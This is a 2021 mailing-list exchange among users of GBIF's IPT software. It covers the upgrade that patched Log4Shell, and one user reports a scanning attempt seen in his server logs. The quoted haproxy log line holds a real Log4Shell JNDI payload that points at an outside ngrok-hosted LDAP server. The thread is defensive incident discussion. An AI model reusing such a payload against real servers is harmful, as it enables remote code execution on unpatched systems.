[IPT] IPT security update (Log4J / Log4Shell exploit)

Julien Cigar julien at perdition.city
Mon Dec 13 13:14:56 UTC 2021 

Hi Matthew,

As we've several hosted IPTs I upgraded immediately but after checking
the logs it looks like it wasn't fast enough:

logging% bzgrep 'jndi' http-access.log.*|grep 'ipt'             
http-access.log.1.bz2:Dec 11 17:04:39 router1 haproxy[14902]: 185.220.101.130 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google%7D HTTP/1.1" 200 169114 "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "ipt.biodiversity.aq" 

Our ipts are hosted in dedicated (FreeBSD) jails and I haven't noticed
something suspicious.. but is there anything that I should check for
specificaly?

Thanks,
Julien


On Sat, Dec 11, 2021 at 10:55:35AM +0100, Matthew Blissett wrote:
> Dear IPT users,
> 
> We have released a new version of the IPT, version 2.5.4 [1]. This version
> contains fixes to critical security issues with the Struts and Log4J[2]
> libraries.
> 
> According to the press [3], the problem with the Log4J library vulnerability
> is being exploited by malicious users — and I can already see queries
> containing "jndi" in the web server logs for the IPTs GBIF hosts at
> cloud.gbif.org, although they are random attempts and would not succeed.
> 
> All users are highly encouraged to upgrade to this version as soon as
> possible.
> 
> As usual, upgrade and installation instructions are in the manual [1].
> Please remember to check your data directory backup is working before
> starting the upgrade.
> 
> [1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
> 
> [2] https://www.lunasec.io/docs/blog/log4j-zero-day/
> 
> [3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
> 
> Best regards,
> 
> Matthew
> 
> 
> _______________________________________________
> IPT mailing list
> IPT at lists.gbif.org
> https://lists.gbif.org/mailman/listinfo/ipt

-- 
Julien Cigar
Belgian Biodiversity Platform (http://www.biodiversity.be)
PGP fingerprint: EEF9 F697 4B68 D275 7B11  6A25 B2BB 3710 A204 23C0
No trees were killed in the creation of this message.
However, many electrons were terribly inconvenienced.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 833 bytes
Desc: not available
URL: <https://lists.gbif.org/pipermail/ipt/attachments/20211213/47f40047/attachment.sig>

More information about the IPT mailing list